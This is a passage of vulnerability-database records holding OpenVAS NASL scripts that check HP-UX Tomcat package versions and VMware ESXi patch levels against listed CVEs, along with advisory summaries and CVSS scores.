Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote increase in privilege\n arbitrary file modification\";\ntag_affected = \"Tomcat Servlet Engine on\n HP-UX B.11.11, B.11.23 and B.11.31 running Tomcat-based Servlet Engine \n v5.5.27.03 or earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Tomcat-based Servlet Engine. The vulnerabilities could be exploited remotely \n to increase privilege or arbitrarily modify files. Tomcat-based Servlet \n Engine is contained in the Apache Web Server Suite.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02241113\");\n script_id(835237);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"02541\");\n script_cve_id(\"CVE-2009-2693\", \"CVE-2009-2902\", \"CVE-2009-3548\");\n script_name(\"HP-UX Update for Tomcat Servlet Engine HPSBUX02541\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Tomcat Servlet Engine\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:00", "description": "Check for the Version of Tomcat Servlet Engine", "cvss3": {}, "published": "2010-06-23T00:00:00", "type": "openvas", "title": "HP-UX Update for Tomcat Servlet Engine HPSBUX02541", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2693", "CVE-2009-2902", "CVE-2009-3548"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:1361412562310835237", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835237", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Tomcat Servlet Engine HPSBUX02541\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote increase in privilege\n arbitrary file modification\";\ntag_affected = \"Tomcat Servlet Engine on\n HP-UX B.11.11, B.11.23 and B.11.31 running Tomcat-based Servlet Engine \n v5.5.27.03 or earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Tomcat-based Servlet Engine. The vulnerabilities could be exploited remotely \n to increase privilege or arbitrarily modify files. Tomcat-based Servlet \n Engine is contained in the Apache Web Server Suite.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02241113\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835237\");\n script_version(\"$Revision: 8250 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 08:29:15 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"02541\");\n script_cve_id(\"CVE-2009-2693\", \"CVE-2009-2902\", \"CVE-2009-3548\");\n script_name(\"HP-UX Update for Tomcat Servlet Engine HPSBUX02541\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Tomcat Servlet Engine\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22TOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsTOMCAT.TOMCAT\", revision:\"B.5.5.29.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-12-19T16:08:51", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0003.2.", "cvss3": {}, "published": "2012-03-16T00:00:00", "type": "openvas", "title": "VMware ESXi/ESX Third party component updates (VMSA-2011-0003.2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0307", "CVE-2010-3562", "CVE-2010-0740", "CVE-2010-2066", "CVE-2010-0089", "CVE-2010-0008", "CVE-2010-0886", "CVE-2010-3557", "CVE-2010-1641", "CVE-2008-0106", "CVE-2010-2248", "CVE-2010-0088", "CVE-2010-2226", "CVE-2010-0410", "CVE-2010-3551", "CVE-2010-0730", "CVE-2010-0085", "CVE-2008-3825", "CVE-2010-0007", "CVE-2008-0086", "CVE-2010-3553", "CVE-2010-3550", "CVE-2010-2521", "CVE-2010-0087", "CVE-2010-1437", "CVE-2010-3566", "CVE-2010-2939", "CVE-2010-3565", "CVE-2010-0092", "CVE-2010-1187", "CVE-2010-3572", "CVE-2009-2693", "CVE-2010-0848", "CVE-2010-0291", "CVE-2010-0082", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2070", "CVE-2010-2524", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-3574", "CVE-2010-0415", "CVE-2010-1157", "CVE-2010-1084", "CVE-2010-0847", "CVE-2010-0842", "CVE-2010-3541", "CVE-2010-0845", "CVE-2010-3571", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-2240", "CVE-2010-0837", "CVE-2009-2901", "CVE-2010-3559", "CVE-2010-1321", "CVE-2010-3081", "CVE-2010-3556", "CVE-2010-0734", "CVE-2010-0849", "CVE-2008-0085", "CVE-2010-3561", "CVE-2008-5416", "CVE-2010-2227", "CVE-2010-0091", "CVE-2010-0622", "CVE-2010-3549", "CVE-2010-1085", "CVE-2010-1086", "CVE-2010-0090", "CVE-2010-3554", "CVE-2010-0433", "CVE-2010-1436", "CVE-2010-2928", "CVE-2010-1173", "CVE-2010-0437", "CVE-2010-3864", "CVE-2010-0093", "CVE-2009-4308", "CVE-2008-0107", "CVE-2010-1088", "CVE-2009-1384", "CVE-2010-3567", "CVE-2010-3573", "CVE-2010-0003", "CVE-2010-1087", "CVE-2009-2902", "CVE-2010-3548", "CVE-2010-0843", "CVE-2010-3568", "CVE-2010-0084", "CVE-2010-0850", "CVE-2010-3569", "CVE-2009-3548"], "modified": "2019-12-18T00:00:00", "id": "OPENVAS:1361412562310103454", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103454", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2011-0003.2 Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103454\");\n script_cve_id(\"CVE-2009-2693\", \"CVE-2009-2901\", \"CVE-2009-2902\", \"CVE-2009-3548\", \"CVE-2010-2227\", \"CVE-2010-1157\", \"CVE-2010-2928\", \"CVE-2010-0734\", \"CVE-2010-1084\", \"CVE-2010-2066\", \"CVE-2010-2070\", \"CVE-2010-2226\", \"CVE-2010-2248\", \"CVE-2010-2521\", \"CVE-2010-2524\", \"CVE-2010-0008\", \"CVE-2010-0415\", \"CVE-2010-0437\", \"CVE-2009-4308\", \"CVE-2010-0003\", \"CVE-2010-0007\", \"CVE-2010-0307\", \"CVE-2010-1086\", \"CVE-2010-0410\", \"CVE-2010-0730\", \"CVE-2010-1085\", \"CVE-2010-0291\", \"CVE-2010-0622\", \"CVE-2010-1087\", \"CVE-2010-1173\", \"CVE-2010-1437\", \"CVE-2010-1088\", \"CVE-2010-1187\", \"CVE-2010-1436\", \"CVE-2010-1641\", \"CVE-2010-3081\", \"CVE-2010-2240\", \"CVE-2008-5416\", \"CVE-2008-0085\", \"CVE-2008-0086\", \"CVE-2008-0107\", \"CVE-2008-0106\", \"CVE-2010-0740\", \"CVE-2010-0433\", \"CVE-2010-3864\", \"CVE-2010-2939\", \"CVE-2009-3555\", \"CVE-2010-0082\", \"CVE-2010-0084\", \"CVE-2010-0085\", \"CVE-2010-0087\", \"CVE-2010-0088\", \"CVE-2010-0089\", \"CVE-2010-0090\", \"CVE-2010-0091\", \"CVE-2010-0092\", \"CVE-2010-0093\", \"CVE-2010-0094\", \"CVE-2010-0095\", \"CVE-2010-0837\", \"CVE-2010-0838\", \"CVE-2010-0839\", \"CVE-2010-0840\", \"CVE-2010-0841\", \"CVE-2010-0842\", \"CVE-2010-0843\", \"CVE-2010-0844\", \"CVE-2010-0845\", \"CVE-2010-0846\", \"CVE-2010-0847\", \"CVE-2010-0848\", \"CVE-2010-0849\", \"CVE-2010-0850\", \"CVE-2010-0886\", \"CVE-2010-3556\", \"CVE-2010-3566\", \"CVE-2010-3567\", \"CVE-2010-3550\", \"CVE-2010-3561\", \"CVE-2010-3573\", \"CVE-2010-3565\", \"CVE-2010-3568\", \"CVE-2010-3569\", \"CVE-2010-1321\", \"CVE-2010-3548\", \"CVE-2010-3551\", \"CVE-2010-3562\", \"CVE-2010-3571\", \"CVE-2010-3554\", \"CVE-2010-3559\", \"CVE-2010-3572\", \"CVE-2010-3553\", \"CVE-2010-3549\", \"CVE-2010-3557\", \"CVE-2010-3541\", \"CVE-2010-3574\", \"CVE-2008-3825\", \"CVE-2009-1384\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi/ESX Third party component updates (VMSA-2011-0003.2)\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 11:19:42 +0100 (Fri, 16 Mar 2012)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2011-0003.html\");\n\n script_tag(name:\"summary\", value:\"The remote ESXi is missing one or more security related Updates from VMSA-2011-0003.2.\");\n\n script_tag(name:\"affected\", value:\"ESXi 4.1 without patch ESXi410-201101201-SG\n\n ESXi 4.0 without patch ESXi400-201103401-SG\n\n ESX 4.1 without patch ESX410-201101201-SG\n\n ESX 4.0 without patches ESX400-201103401-SG, ESX400-201103403-SG\");\n\n script_tag(name:\"insight\", value:\"a. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3\n\n Microsoft SQL Server 2005 Express Edition (SQL Express) distributed with vCenter Server 4.1 Update 1 and vCenter\n Update Manager 4.1 Update 1 is upgraded from SQL Express Service Pack 2 to SQL Express Service Pack 3, to address\n multiple security issues that exist in the earlier releases of Microsoft SQL Express. Customers using other database\n solutions need not update for these issues.\n\n b. vCenter Apache Tomcat Management Application Credential Disclosure\n\n The Apache Tomcat Manager application configuration file contains logon credentials that can be read by unprivileged local\n users. The issue is resolved by removing the Manager application in vCenter 4.1 Update 1. If vCenter 4.1 is updated to vCenter\n 4.1 Update 1 the logon credentials are not present in the configuration file after the update.\n\n c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21\n\n Oracle (Sun) JRE update to version 1.6.0_21, which addresses multiple security issues that existed in earlier releases of\n Oracle (Sun) JRE.\n\n d. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26\n\n Oracle (Sun) JRE update to version 1.5.0_26, which addresses multiple security issues that existed in earlier releases of\n Oracle (Sun) JRE.\n\n e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n Apache Tomcat updated to version 6.0.28, which addresses multiple security issues that existed in earlier releases of Apache\n Tomcat\n\n f. vCenter Server third party component OpenSSL updated to version 0.9.8n\n\n The version of the OpenSSL library in vCenter Server is updated to 0.9.8n.\n\n g. ESX third party component OpenSSL updated to version 0.9.8p\n\n The version of the ESX OpenSSL library is updated to 0.9.8p.\n\n h. ESXi third party component cURL updated\n\n The version of cURL library in ESXi is updated.\n\n i. ESX third party component pam_krb5 updated\n\n The version of pam_krb5 library is updated.\n\n j. ESX third party update for Service Console kernel\n\n The Service Console kernel is updated to include kernel version 2.6.18-194.11.1.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"vmware_esx.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"4.1.0\", \"ESXi410-201101201-SG\",\n \"4.0.0\", \"ESXi400-201103401-SG\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-30T10:48:18", "description": "The remote ESXi is missing one or more security related Updates from VMSA-2011-0003.2.\n\nSummary\n\nUpdate 1 for vCenter Server 4.x, vCenter Update Manager 4.x, vSphere Hypervisor (ESXi) 4.1, ESXi 4.1,\naddresses several security issues.\n\nRelevant releases\n\nvCenter Server 4.1 without Update 1,\nvCenter Server 4.0 without Update 3,\nvCenter Update Manager 4.1 without Update 1,\nvCenter Update Manager 4.0 without Update 3,\nESXi 4.1 without patch ESXi410-201101201-SG,\nESXi 4.0 without patch ESXi400-201103401-SG.\nESX 4.1 without patch ESX410-201101201-SG.\nESX 4.0 without patches ESX400-201103401-SG, ESX400-201103403-SG.\n \nProblem Description\n\na. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3\n\n Microsoft SQL Server 2005 Express Edition (SQL Express) distributed with vCenter Server 4.1 Update 1 and vCenter\n Update Manager 4.1 Update 1 is upgraded from SQL Express Service Pack 2 to SQL Express Service Pack 3, to address\n multiple security issues that exist in the earlier releases of Microsoft SQL Express. Customers using other database\n solutions need not update for these issues.\n\nb. vCenter Apache Tomcat Management Application Credential Disclosure\n\n The Apache Tomcat Manager application configuration file contains logon credentials that can be read by unprivileged local\n users. The issue is resolved by removing the Manager application in vCenter 4.1 Update 1. If vCenter 4.1 is updated to vCenter\n 4.1 Update 1 the logon credentials are not present in the configuration file after the update.\n\nc. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21\n\n Oracle (Sun) JRE update to version 1.6.0_21, which addresses multiple security issues that existed in earlier releases of \n Oracle (Sun) JRE.\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26\n\n Oracle (Sun) JRE update to version 1.5.0_26, which addresses multiple security issues that existed in earlier releases of \n Oracle (Sun) JRE.\n\ne. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n Apache Tomcat updated to version 6.0.28, which addresses multiple security issues that existed in earlier releases of Apache\n Tomcat\n\nf. vCenter Server third party component OpenSSL updated to version 0.9.8n\n\n The version of the OpenSSL library in vCenter Server is updated to 0.9.8n.\n\ng. ESX third party component OpenSSL updated to version 0.9.8p\n\n The version of the ESX OpenSSL library is updated to 0.9.8p.\n\nh. ESXi third party component cURL updated\n\n The version of cURL library in ESXi is updated.\n\ni. ESX third party component pam_krb5 updated\n\n The version of pam_krb5 library is updated.\n\nj. ESX third party update for Service Console kernel\n\n The Service Console kernel is updated to include kernel version 2.6.18-194.11.1.", "cvss3": {}, "published": "2012-03-16T00:00:00", "type": "openvas", "title": "VMSA-2011-0003.2 Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0307", "CVE-2010-3562", "CVE-2010-0740", "CVE-2010-2066", "CVE-2010-0089", "CVE-2010-0008", "CVE-2010-0886", "CVE-2010-3557", "CVE-2010-1641", "CVE-2008-0106", "CVE-2010-2248", "CVE-2010-0088", "CVE-2010-2226", "CVE-2010-0410", "CVE-2010-3551", "CVE-2010-0730", "CVE-2010-0085", "CVE-2008-3825", "CVE-2010-0007", "CVE-2008-0086", "CVE-2010-3553", "CVE-2010-3550", "CVE-2010-2521", "CVE-2010-0087", "CVE-2010-1437", "CVE-2010-3566", "CVE-2010-2939", "CVE-2010-3565", "CVE-2010-0092", "CVE-2010-1187", "CVE-2010-3572", "CVE-2009-2693", "CVE-2010-0848", "CVE-2010-0291", "CVE-2010-0082", "CVE-2010-0838", "CVE-2010-0840", "CVE-2010-0095", "CVE-2010-2070", "CVE-2010-2524", "CVE-2010-0839", "CVE-2010-0094", "CVE-2010-3574", "CVE-2010-0415", "CVE-2010-1157", "CVE-2010-1084", "CVE-2010-0847", "CVE-2010-0842", "CVE-2010-3541", "CVE-2010-0845", "CVE-2010-3571", "CVE-2009-3555", "CVE-2010-0841", "CVE-2010-0844", "CVE-2010-0846", "CVE-2010-2240", "CVE-2010-0837", "CVE-2009-2901", "CVE-2010-3559", "CVE-2010-1321", "CVE-2010-3081", "CVE-2010-3556", "CVE-2010-0734", "CVE-2010-0849", "CVE-2008-0085", "CVE-2010-3561", "CVE-2008-5416", "CVE-2010-2227", "CVE-2010-0091", "CVE-2010-0622", "CVE-2010-3549", "CVE-2010-1085", "CVE-2010-1086", "CVE-2010-0090", "CVE-2010-3554", "CVE-2010-0433", "CVE-2010-1436", "CVE-2010-2928", "CVE-2010-1173", "CVE-2010-0437", "CVE-2010-3864", "CVE-2010-0093", "CVE-2009-4308", "CVE-2008-0107", "CVE-2010-1088", "CVE-2009-1384", "CVE-2010-3567", "CVE-2010-3573", "CVE-2010-0003", "CVE-2010-1087", "CVE-2009-2902", "CVE-2010-3548", "CVE-2010-0843", "CVE-2010-3568", "CVE-2010-0084", "CVE-2010-0850", "CVE-2010-3569", "CVE-2009-3548"], "modified": "2017-10-26T00:00:00", "id": "OPENVAS:103454", "href": "http://plugins.openvas.org/nasl.php?oid=103454", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2011-0003.nasl 7583 2017-10-26 12:07:01Z cfischer $\n#\n# VMSA-2011-0003.2 Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Apply the missing patch(es).\n\nSee Also:\nhttp://www.vmware.com/security/advisories/VMSA-2011-0003.html\";\n\ntag_summary = \"The remote ESXi is missing one or more security related Updates from VMSA-2011-0003.2.\n\nSummary\n\nUpdate 1 for vCenter Server 4.x, vCenter Update Manager 4.x, vSphere Hypervisor (ESXi) 4.1, ESXi 4.1,\naddresses several security issues.\n\nRelevant releases\n\nvCenter Server 4.1 without Update 1,\nvCenter Server 4.0 without Update 3,\nvCenter Update Manager 4.1 without Update 1,\nvCenter Update Manager 4.0 without Update 3,\nESXi 4.1 without patch ESXi410-201101201-SG,\nESXi 4.0 without patch ESXi400-201103401-SG.\nESX 4.1 without patch ESX410-201101201-SG.\nESX 4.0 without patches ESX400-201103401-SG, ESX400-201103403-SG.\n \nProblem Description\n\na. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3\n\n Microsoft SQL Server 2005 Express Edition (SQL Express) distributed with vCenter Server 4.1 Update 1 and vCenter\n Update Manager 4.1 Update 1 is upgraded from SQL Express Service Pack 2 to SQL Express Service Pack 3, to address\n multiple security issues that exist in the earlier releases of Microsoft SQL Express. Customers using other database\n solutions need not update for these issues.\n\nb. vCenter Apache Tomcat Management Application Credential Disclosure\n\n The Apache Tomcat Manager application configuration file contains logon credentials that can be read by unprivileged local\n users. The issue is resolved by removing the Manager application in vCenter 4.1 Update 1. If vCenter 4.1 is updated to vCenter\n 4.1 Update 1 the logon credentials are not present in the configuration file after the update.\n\nc. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21\n\n Oracle (Sun) JRE update to version 1.6.0_21, which addresses multiple security issues that existed in earlier releases of \n Oracle (Sun) JRE.\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26\n\n Oracle (Sun) JRE update to version 1.5.0_26, which addresses multiple security issues that existed in earlier releases of \n Oracle (Sun) JRE.\n\ne. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n Apache Tomcat updated to version 6.0.28, which addresses multiple security issues that existed in earlier releases of Apache\n Tomcat\n\nf. vCenter Server third party component OpenSSL updated to version 0.9.8n\n\n The version of the OpenSSL library in vCenter Server is updated to 0.9.8n.\n\ng. ESX third party component OpenSSL updated to version 0.9.8p\n\n The version of the ESX OpenSSL library is updated to 0.9.8p.\n\nh. ESXi third party component cURL updated\n\n The version of cURL library in ESXi is updated.\n\ni. ESX third party component pam_krb5 updated\n\n The version of pam_krb5 library is updated.\n\nj. ESX third party update for Service Console kernel\n\n The Service Console kernel is updated to include kernel version 2.6.18-194.11.1.\";\n\n\nif (description)\n{\n script_id(103454);\n script_cve_id(\"CVE-2009-2693\",\"CVE-2009-2901\",\"CVE-2009-2902\",\"CVE-2009-3548\",\"CVE-2010-2227\",\"CVE-2010-1157\",\"CVE-2010-2928\",\"CVE-2010-0734\",\"CVE-2010-1084\",\"CVE-2010-2066\",\"CVE-2010-2070\",\"CVE-2010-2226\",\"CVE-2010-2248\",\"CVE-2010-2521\",\"CVE-2010-2524\",\"CVE-2010-0008\",\"CVE-2010-0415\",\"CVE-2010-0437\",\"CVE-2009-4308\",\"CVE-2010-0003\",\"CVE-2010-0007\",\"CVE-2010-0307\",\"CVE-2010-1086\",\"CVE-2010-0410\",\"CVE-2010-0730\",\"CVE-2010-1085\",\"CVE-2010-0291\",\"CVE-2010-0622\",\"CVE-2010-1087\",\"CVE-2010-1173\",\"CVE-2010-1437\",\"CVE-2010-1088\",\"CVE-2010-1187\",\"CVE-2010-1436\",\"CVE-2010-1641\",\"CVE-2010-3081\",\"CVE-2010-2240\",\"CVE-2008-5416\",\"CVE-2008-0085\",\"CVE-2008-0086\",\"CVE-2008-0107\",\"CVE-2008-0106\",\"CVE-2010-0740\",\"CVE-2010-0433\",\"CVE-2010-3864\",\"CVE-2010-2939\",\"CVE-2009-3555\",\"CVE-2010-0082\",\"CVE-2010-0084\",\"CVE-2010-0085\",\"CVE-2010-0087\",\"CVE-2010-0088\",\"CVE-2010-0089\",\"CVE-2010-0090\",\"CVE-2010-0091\",\"CVE-2010-0092\",\"CVE-2010-0093\",\"CVE-2010-0094\",\"CVE-2010-0095\",\"CVE-2010-0837\",\"CVE-2010-0838\",\"CVE-2010-0839\",\"CVE-2010-0840\",\"CVE-2010-0841\",\"CVE-2010-0842\",\"CVE-2010-0843\",\"C